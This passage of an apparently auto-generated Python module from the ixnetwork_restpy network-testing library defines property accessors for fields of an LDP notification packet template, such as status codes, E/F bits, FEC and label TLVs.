Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedAdvertisementModeFBit']))
@property
def SessionRejectedAdvertisementModeStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000011
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedAdvertisementModeStatusData']))
@property
def SessionRejectedMaxPDULengthEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedMaxPDULengthEBit']))
@property
def SessionRejectedMaxPDULengthFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedMaxPDULengthFBit']))
@property
def SessionRejectedMaxPDULengthStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000012
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedMaxPDULengthStatusData']))
@property
def SessionRejectedLabelRangeEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedLabelRangeEBit']))
@property
def SessionRejectedLabelRangeFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedLabelRangeFBit']))
@property
def SessionRejectedLabelRangeStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000013
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedLabelRangeStatusData']))
@property
def KeepaliveTimerExiredEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['KeepaliveTimerExiredEBit']))
@property
def KeepaliveTimerExiredFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['KeepaliveTimerExiredFBit']))
@property
def KeepaliveTimerExiredStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000014
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['KeepaliveTimerExiredStatusData']))
@property
def LabelRequestAbortedEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelRequestAbortedEBit']))
@property
def LabelRequestAbortedFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelRequestAbortedFBit']))
@property
def LabelRequestAbortedStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000015
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelRequestAbortedStatusData']))
@property
def MissingMessageParametersEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MissingMessageParametersEBit']))
@property
def MissingMessageParametersFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MissingMessageParametersFBit']))
@property
def MissingMessageParametersStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000016
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MissingMessageParametersStatusData']))
@property
def UnsupportedAddressFamilyEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnsupportedAddressFamilyEBit']))
@property
def UnsupportedAddressFamilyFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnsupportedAddressFamilyFBit']))
@property
def UnsupportedAddressFamilyStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000017
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnsupportedAddressFamilyStatusData']))
@property
def SessionRejectedBadKeepaliveTimeEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedBadKeepaliveTimeEBit']))
@property
def SessionRejectedBadKeepaliveTimeFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedBadKeepaliveTimeFBit']))
@property
def SessionRejectedBadKeepaliveTimeStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000018
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedBadKeepaliveTimeStatusData']))
@property
def InternalErrorEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['InternalErrorEBit']))
@property
def InternalErrorFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['InternalErrorFBit']))
@property
def InternalErrorStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000019
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['InternalErrorStatusData']))
@property
def StatusTLVMessageID(self):
"""
Display Name: Message ID
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['StatusTLVMessageID']))
@property
def StatusTLVMessageType(self):
"""
Display Name: Message type
Default Value: 256
Value Format: decimal
Available enum values: Notification message, 1, Hello message, 256, Initialization message, 512, Keepalive message, 513, Address message, 768, Address withdraw message, 769, Label mapping message, 1024, Label request message, 1025, Label withdraw message, 1026, Label release message, 1027, Label abort request message, 1028
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['StatusTLVMessageType']))
@property
def TclLDPMpStatusTLVUBit(self):
"""
Display Name: U bit
Default Value: 1
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclLDPMpStatusTLVUBit']))
@property
def TclLDPMpStatusTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclLDPMpStatusTLVFBit']))
@property
def TclLDPMpStatusTLVTclType(self):
"""
Display Name: Type
Default Value: 0x0040
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclLDPMpStatusTLVTclType']))
@property
def TclLDPMpStatusTLVTclLength(self):
"""
Display Name: Length
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclLDPMpStatusTLVTclLength']))
@property
def TclCustomTypeTclType(self):
"""
Display Name: Type
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclCustomTypeTclType']))
@property
def TclCustomTypeTclLength(self):
"""
Display Name: Length
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclCustomTypeTclLength']))
@property
def TclCustomTypeTclValue(self):
"""
Display Name: Value
Default Value: 0x00
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclCustomTypeTclValue']))
@property
def FecTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FecTLVUBit']))
@property
def FecTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FecTLVFBit']))
@property
def FecTLVType(self):
"""
Display Name: Type
Default Value: 0x0100
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FecTLVType']))
@property
def FecTLVLength(self):
"""
Display Name: Length
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FecTLVLength']))
@property
def TclP2mpTclType(self):
"""
Display Name: Type
Default Value: 0x06
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclP2mpTclType']))
@property
def TclIpv4P2mpAddressTclP2mpAddressFamily(self):
"""
Display Name: Address Family
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclIpv4P2mpAddressTclP2mpAddressFamily']))
@property
def TclIpv4P2mpAddressTclP2mpAddressLength(self):
"""
Display Name: Address length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclIpv4P2mpAddressTclP2mpAddressLength']))
@property
def TclIpv4P2mpAddressTclRootAddress(self):
"""
Display Name: Root Node Address
Default Value: 0.0.0.0
Value Format: iPv4
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclIpv4P2mpAddressTclRootAddress']))
@property
def TclIpv6P2mpAddressTclP2mpIpv6AddressFamily(self):
"""
Display Name: Address Family
Default Value: 2
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclIpv6P2mpAddressTclP2mpIpv6AddressFamily']))
@property
def TclIpv6P2mpAddressTclP2mpIpv6AddressLength(self):
"""
Display Name: Address length
Default Value: 16
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclIpv6P2mpAddressTclP2mpIpv6AddressLength']))
@property
def TclIpv6P2mpAddressTclIpv6RootAddress(self):
"""
Display Name: Root Node Address
Default Value: 0
Value Format: iPv6
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclIpv6P2mpAddressTclIpv6RootAddress']))
@property
def TclP2mpTclOpaqueLength(self):
"""
Display Name: Opaque Length
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclP2mpTclOpaqueLength']))
@property
def TclGenericLSPIdentifierTLVTclType(self):
"""
Display Name: Type
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclGenericLSPIdentifierTLVTclType']))
@property
def TclGenericLSPIdentifierTLVTclLength(self):
"""
Display Name: Length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclGenericLSPIdentifierTLVTclLength']))
@property
def TclGenericLSPIdentifierTLVTclValue(self):
"""
Display Name: Value
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclGenericLSPIdentifierTLVTclValue']))
@property
def TclEditTLVTclType(self):
"""
Display Name: Type
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclEditTLVTclType']))
@property
def TclEditTLVTclLength(self):
"""
Display Name: Length
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclEditTLVTclLength']))
@property
def TclEditTLVTclValue(self):
"""
Display Name: Value
Default Value: 0x00
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclEditTLVTclValue']))
@property
def TclP2mpTypedWcardTclTypeTypedWcard(self):
"""
Display Name: Typed Wcard
Default Value: 0x00
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclP2mpTypedWcardTclTypeTypedWcard']))
@property
def TclP2mpTypedWcardTclTypeWcard(self):
"""
Display Name: Type
Default Value: 0x06
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclP2mpTypedWcardTclTypeWcard']))
@property
def TclP2mpTypedWcardTclTypeLen(self):
"""
Display Name: Len
Default Value: 2
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclP2mpTypedWcardTclTypeLen']))
@property
def TclP2mpTypedWcardTclTypeAfi(self):
"""
Display Name: AFI
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclP2mpTypedWcardTclTypeAfi']))
@property
def GenericLabelTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GenericLabelTLVUBit']))
@property
def GenericLabelTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GenericLabelTLVFBit']))
@property
def GenericLabelTLVType(self):
"""
Display Name: Type
Default Value: 0x0200
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GenericLabelTLVType']))
@property
def GenericLabelTLVLength(self):
"""
Display Name: Length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GenericLabelTLVLength']))
@property
def GenericLabelTLVLabel(self):
"""
Display Name: Label
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GenericLabelTLVLabel']))
@property
def AtmLabelTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVUBit']))
@property
def AtmLabelTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVFBit']))
@property
def AtmLabelTLVType(self):
"""
Display Name: Type
Default Value: 0x0201
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVType']))
@property
def AtmLabelTLVLength(self):
"""
Display Name: Length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVLength']))
@property
def AtmLabelTLVReserved(self):
"""
Display Name: Reserved
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVReserved']))
@property
def AtmLabelTLVVBits(self):
"""
Display Name: V bits
Default Value: 0
Value Format: decimal
Available enum values: VPI and VCI significant, 0, Only VPI significant, 1, Only VCI significant, 2
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVVBits']))
@property
def AtmLabelTLVVpi(self):
"""
Display Name: VPI
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVVpi']))
@property
def AtmLabelTLVVci(self):
"""
Display Name: VCI
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVVci']))
@property
def FrameRelayLabelTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FrameRelayLabelTLVUBit']))
@property
def FrameRelayLabelTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FrameRelayLabelTLVFBit']))
@property
def FrameRelayLabelTLVType(self):
"""
Display Name: Type
Default Value: 0x0202
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FrameRelayLabelTLVType']))
@property
def FrameRelayLabelTLVLength(self):
"""
Display Name: Length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FrameRelayLabelTLVLength']))
@property
def FrameRelayLabelTLVReserved(self):
"""
Display Name: Reserved
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FrameRelayLabelTLVReserved']))
@property
def FrameRelayLabelTLVDlciLength(self):
"""
Display Name: DLCI length
Default Value: 0
Value Format: decimal
Available enum values: 10 bits, 0, 23 bits, 2
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FrameRelayLabelTLVDlciLength']))
@property
def FrameRelayLabelTLVDlci(self):
"""
Display Name: DLCI
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FrameRelayLabelTLVDlci']))
@property
def ExtendedStatusTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExtendedStatusTLVUBit']))
@property
def ExtendedStatusTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExtendedStatusTLVFBit']))
@property
def ExtendedStatusTLVType(self):
"""
Display Name: Type
Default Value: 0x0301
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExtendedStatusTLVType']))
@property
def ExtendedStatusTLVLength(self):
"""
Display Name: Length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExtendedStatusTLVLength']))
@property
def ExtendedStatusTLVCode(self):
"""
Display Name: Code
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExtendedStatusTLVCode']))
@property
def ReturnedPDUTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedPDUTLVUBit']))
@property
def ReturnedPDUTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedPDUTLVFBit']))
@property
def ReturnedPDUTLVType(self):
"""
Display Name: Type
Default Value: 0x0302
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedPDUTLVType']))
@property
def ReturnedPDUTLVLength(self):
"""
Display Name: Length
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedPDUTLVLength']))
@property
def ReturnedMessageTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedMessageTLVUBit']))
@property
def ReturnedMessageTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedMessageTLVFBit']))
@property
def ReturnedMessageTLVType(self):
"""
Display Name: Type
Default Value: 0x0303
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedMessageTLVType']))
@property
def ReturnedMessageTLVLength(self):
"""
Display Name: Length
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ReturnedMessageTLVLength']))
@property
def ExtendedStatusTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExtendedStatusTLVUBit']))
@property
def ExtendedStatusTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExtendedStatusTLVFBit']))
@property
def ExtendedStatusTLVType(self):
"""
Display Name: Type
Default Value: 0x0301
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExtendedStatusTLVType']))
@property
def ExtendedStatusTLVLength(self):
"""
Display Name: Length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExtendedStatusTLVLength']))
@property
def ExtendedStatusTLVCode(self):
"""
Display Name: Code
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExtendedStatusTLVCode']))
def add(self):
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.